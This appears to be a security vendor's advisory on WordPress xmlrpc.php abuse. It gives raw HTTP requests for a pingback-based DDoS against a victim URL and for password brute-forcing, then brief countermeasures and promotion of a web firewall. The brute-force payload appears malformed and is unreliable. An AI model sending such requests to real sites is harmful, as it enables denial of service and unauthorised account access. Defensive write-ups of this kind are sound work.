1. overview :
The xmlrpc.php file in WordPress utilizes HTTP as the transport mechanism. It is WordPress' ability to transfer data with XML acting as the encoding mechanism. It is a file created to handle the task of communicating with other systems (other blogs or apps) and through that xmlrpc.php file, you can run pingback and brute-force attacks.
- pingback = the ability to send a ping back to the original post when someone quotes yours
- brute-force = brute force attack
2. attack process :
1) Make sure xmlrpc.php is enabled
- GET /xmlrpc.php from your WordPress host
- In some cases, the path is /wordpress/xmlrpc.php or /wp/xmlrpc.php
- If you receive the response "XML-RPC server accept POST requests only." from the server. This means that the vulnerable xmlrpc.php file is activated.
2-1) pingback attack
POST /xmlrpc.php HTTP/1.1
Content-Length: 258
Content-Type: application/xml; charset=utf-8
Host: xxx.com
User-Agent: HTTPie
<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://victim.com</string></value></param><param><value><string>http://xxx/sample-page/</string></value></param></params></methodCall>- A DDoS attack using pingback can be attempted to knock the server offline and paralyze it. The functionality of xmlrpc.php gives attackers a waypoint to launch DDoS attacks and can impact server speed and availability.
2-2) Brute-force attack
POST /xmlrpc.php HTTP/1.1
Content-Length: 239
Content-Type: application/xml; charset=utf-8
Host: xxx.com
User-Agent: HTTPie
<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>system.multicall</methodName><params><param><value><string>testid</string></value></param><param><value><string>testpasswrod/</string></value></param></params></methodCall>- A brute-force attack attempts to log in with a supposed WordPress admin. Since the WordPress admin page address is fixed, they can try hundreds of different passwords to hack into your site.
3. Countermeasures :
For servers, this can be done through the configuration file or through the relevant plugin.
In our AIWAF product, we detect the attack syntax that exploits this vulnerability with the <Wordpress xmlrpc.php DoS> pattern.
4. Conclusion :
Although it is a relatively easy vulnerability to respond to, it requires a quick response due to the large number of web services that utilize Wordpress, so it requires regular checks and updates as updates are constantly released.
In our AIWAF product, we have developed a number of patterns to respond to Wordpress xmlrpc.php-related vulnerabilities, and we will continue to respond quickly to Wordpress xmlrpc.php-related vulnerabilities that are discovered in the future.
